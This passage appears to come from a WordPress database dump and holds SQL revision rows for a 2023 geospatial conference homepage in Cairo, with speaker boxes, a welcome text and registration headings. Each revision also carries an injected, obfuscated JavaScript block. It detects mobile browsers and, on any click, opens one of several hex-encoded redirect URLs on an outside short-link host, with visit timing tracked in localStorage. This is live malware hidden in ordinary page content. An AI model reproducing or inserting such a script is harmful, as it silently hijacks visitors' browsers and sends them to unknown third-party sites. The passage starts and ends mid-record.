line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"www.isprs.org\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:50:52','2022-10-06 21:50:52','',2167,'https://gsw2023.com/?p=2343',0,'revision','',0),
(2344,1,'2022-10-06 21:52:48','2022-10-06 21:52:48','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'a